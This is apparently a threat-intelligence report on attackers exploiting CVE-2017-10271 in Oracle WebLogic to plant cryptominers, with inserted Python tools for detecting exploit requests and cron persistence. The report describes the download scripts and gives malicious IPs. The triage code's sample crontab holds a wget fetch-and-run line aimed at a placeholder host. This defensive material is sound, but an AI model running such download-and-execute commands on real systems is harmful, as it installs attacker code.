
              Unpatched Oracle WebLogic Servers Infected with Cryptocurrency Software

              By exploiting a known vulnerability on Internet-facing Oracle WebLogic servers, threat actors deployed cryptocurrency miners to Linux and Windows systems.
              By: Incident Response Team

              In December 2017, Secureworks® incident response (IR) analysts responded to multiple incidents where threat actors compromised vulnerable Internet-facing Oracle WebLogic servers on Linux and Windows systems to deploy cryptocurrency software. The unauthorized activity significantly impacted the performance of business-critical and client-facing applications. The continued inquiries about this activity in January 2018 suggest that many organizations have been affected.

              Triage of the available data from compromised Linux systems revealed binary files in the /tmp directory consuming processing power and causing performance degradation. When analyzing infected hosts, IR analysts discovered a series of POST requests to /wls-wsat/CoordinatorPortType11 that resulted in an HTTP error code 500 (internal server error). The POST requests attempted to exploit WebLogic vulnerability CVE-2017-10271, which Oracle addressed in October 2017. According to the vulnerability description, this "easily exploitable" issue allows an "unauthenticated attacker with network access via HTTP to compromise [an] Oracle WebLogic Server."
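A detection pass over access logs for the exploitation attempts described above, written as an added example that is not part of the Secureworks report. It assumes a common-log-format access log (the sample lines below are constructed) and flags every POST to /wls-wsat/CoordinatorPortType11, recording the status code rather than filtering on it.

```python
import re

# Constructed sample WebLogic access-log lines in common log format (not from the report).
SAMPLE_LOG = """\
203.0.113.5 - - [14/Dec/2017:03:12:07 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4213
203.0.113.5 - - [14/Dec/2017:03:12:09 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 1062
203.0.113.5 - - [14/Dec/2017:03:12:11 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 1062
198.51.100.9 - - [14/Dec/2017:03:15:42 +0000] "GET /wls-wsat/CoordinatorPortType11 HTTP/1.1" 200 1543
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Endpoint the report names as the target of the CVE-2017-10271 POST requests.
WSAT_ENDPOINT = "/wls-wsat/CoordinatorPortType11"


def find_wsat_posts(log_text: str) -> list[dict]:
    """Return one record per POST to the WLS-WSAT endpoint.

    The incidents showed HTTP 500 responses, but the status is only
    recorded, not used as a filter: a 200 does not mean the request
    was harmless, and a 500 does not mean the exploit failed.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        if m["method"] == "POST" and m["path"].startswith(WSAT_ENDPOINT):
            hits.append({"src": m["src"], "ts": m["ts"], "status": int(m["status"])})
    return hits


def count_by_source(hits: list[dict]) -> dict[str, int]:
    """Count POST attempts per source address; repeated attempts are typical."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h["src"]] = counts.get(h["src"], 0) + 1
    return counts
```

Run the result against the firewall or proxy logs for the same window to confirm whether any outbound fetch followed a flagged request.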

              Examination of client environments revealed at least two variations of a Bash script downloaded after successful exploitation. The first variation (see Figure 1) instructs the impacted system to use Wget to download "72 . 11 . 140 . 178/files/l/default" (MD5: faca70429c736dbf0caf2c644622078f) and save it to /tmp/rcp_bh. Once downloaded, rcp_bh is executed to run in the background on the compromised system.

              Figure 1. Bash function to download cryptocurrency software. (Source: Secureworks)

The second script variation branches on the name of the impacted service account. As shown in Figure 2, the Bash script prints the name of the user account running the script. If the account is root, root.sh is downloaded to /etc/root.sh and executed; for any other account, lower.sh is downloaded to the /tmp directory and executed.

              Figure 2. Bash script identifying user. (Source: Secureworks)

If root.sh is executed, it downloads and executes "nativesvc" from 207 . 246 . 68 . 21. The script then establishes persistence on the compromised server by creating a cron job and modifying the rc.local file to continually check for the miner and download a new copy if the check fails. If lower.sh is executed, it downloads and executes a cryptocurrency mining binary file named "river" from 207 . 246 . 125 . 40 but does not create a persistence mechanism.
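A host-side triage helper for the cron and rc.local persistence just described, added here as an example and not part of the report or its scripts. It assumes user-crontab format (no user field); the crontab and rc.local contents below are constructed, and the wget line uses a placeholder host.

```python
import re

# Script and binary names from the report; the re-download loop reinstalls these.
KNOWN_NAMES = {"rcp_bh", "nativesvc", "river", "root.sh", "lower.sh"}
# Heuristic: a download tool writing into /tmp is unusual in legitimate cron entries.
FETCH_TO_TMP = re.compile(r"\b(wget|curl)\b.*\s/tmp/")

# Constructed samples (user-crontab format, no user field); not captured from a real host.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /etc/root.sh >/dev/null 2>&1
@reboot /usr/bin/wget -q -O /tmp/updater http://placeholder.invalid/u && /tmp/updater
"""
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
/etc/root.sh &
exit 0
"""

def crontab_commands(text: str) -> list[tuple[str, str]]:
    """Return (schedule, command) pairs; skip comments, blanks and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):  # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry; leave for manual review
            sched, cmd = " ".join(fields[:5]), fields[5]
        entries.append((sched, cmd))
    return entries

def is_suspicious(cmd: str) -> bool:
    """Flag commands that reference a known name or fetch a file into /tmp."""
    basenames = {p.rsplit("/", 1)[-1] for p in re.findall(r"/\S+", cmd)}
    return bool(basenames & KNOWN_NAMES) or FETCH_TO_TMP.search(cmd) is not None

def triage(crontab: str, rc_local: str) -> dict[str, list[str]]:
    """Return suspicious cron commands and rc.local lines for analyst review."""
    cron_hits = [cmd for _, cmd in crontab_commands(crontab) if is_suspicious(cmd)]
    rc_lines = [ln.strip() for ln in rc_local.splitlines()]
    rc_hits = [ln for ln in rc_lines if ln and not ln.startswith("#") and is_suspicious(ln)]
    return {"cron": cron_hits, "rc_local": rc_hits}
```

On a live host, feed it the output of `crontab -l` for each account and the contents of /etc/rc.local, and review /etc/cron.d and /etc/crontab (which add a user field) separately.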

              Windows hosts running vulnerable Oracle WebLogic servers have also been targeted. Observed attacks have downloaded open-source miners such as XMRig.

              These incidents are representative of broader campaigns by financially motivated threat actors to deploy cryptocurrency mining software to large numbers of infected hosts. The market valuation of various cryptocurrencies and the ability to outsource resource costs associated with mining make this kind of activity attractive to threat actors. This type of activity will likely continue as long as cryptocurrency mining provides a return on investment for generating funds.

              In addition to reviewing and applying the Oracle security update as appropriate, network defenders should implement the following mitigations. These mitigations also protect systems against other types of threats.

              • Disable unnecessary services, including internal network protocols such as SMBv1 if possible. Remove applications that do not serve a legitimate business function, and consider restricting access to integral system components such as PowerShell that cannot be removed but are unnecessary for most users.
              • Review and apply appropriate security updates for operating systems and applications in a timely manner.
              • Apply the principle of least privilege for system and application credentials, limiting administrator-level access to authorized users and contexts. For Windows systems, consider a solution such as Microsoft’s Local Administrator Password Solution (LAPS) to simplify and strengthen password management.
              • If possible, implement endpoint and network security technologies and centralized logging to detect, restrict, and capture malicious activity. Managing outbound network connections through monitored egress points can help to identify outbound cryptocurrency mining traffic, particularly unencrypted traffic using non-standard ports.

              The indicators in Table 1 are associated with this threat. Note that IP addresses can be reallocated. The domains and IP addresses may contain malicious content, so consider the risks before opening them in a browser.

              Table 1. Indicators for this threat.
